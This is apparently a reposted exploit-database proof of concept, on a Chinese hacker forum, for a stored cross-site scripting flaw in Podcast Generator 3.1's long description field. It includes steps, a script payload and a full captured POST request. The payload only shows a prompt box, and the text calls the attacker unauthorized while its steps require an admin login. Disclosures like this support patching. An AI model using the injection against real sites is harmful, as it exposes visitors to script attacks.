Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS) - 黑帽漏洞数据库

发布于2022年11月4日2年前
# Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)
# Date: 13/05/2021
# Exploit Author: Ayşenur KARAASLAN
# Vendor Homepage: https://podcastgenerator.net/demoV2/
# Software Link: https://podcastgenerator.net/download and https://github.com/PodcastGenerator/PodcastGenerator/archive/v3.1.1.zip
# Version: < 3.1.1
# CVE: N/A

Podcast Generator is an open source Content Management System written in PHP and specifically designed for podcast publishing.

#Description
The following is PoC to use the XSS bug with unauthorized user.

1. Login to your admin account.
2. "Upload New Episode" or "Edit" field has got "Long Description". Long Description field is not filtered.  It is possible to place JavaScript code.
3. Click the Home button
4. Click "More" button of created or edited episode.

# Vulnerable Parameter Type: POST
# Vulnerable Parameter: long_description
# Attack Pattern: <script>prompt("Aysenur-PoC")</script>

#PoC
HTTP Request:

POST /demoV2/pg/?p=admin&do=edit&c=ok HTTP/1.1
Host: podcastgenerator.net
Cookie: PHPSESSID=2k93317b1dcraih0ti3p8rehc4;
_ga=GA1.2.2015734934.1620928725; _gid=GA1.2.1455863373.1620928725
Content-Length: 1590
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://podcastgenerator.net
Content-Type: multipart/form-data;
boundary=----WebKitFormBoundaryMJiUJ3BGzyG5zwxd
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: frame
Referer:
https://podcastgenerator.net/demoV2/pg/?p=admin&do=edit&=episode&name=aysenurxss-poc.jpg
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="userfile"

aysenurxss-poc.jpg
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="title"

Aysenur-PoC
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="description"

poc
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="countdown"

255
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="category[]"

about
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Day"

13
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Month"

5
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Year"

2021
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Hour"

14
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="Minute"

29
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="long_description"

<script>prompt("aysenur-xss")</script>
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="keywords"

poc
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="explicit"

no
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="auth_name"

aysenur
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd
Content-Disposition: form-data; name="auth_email"

[email protected]
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd--
登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索
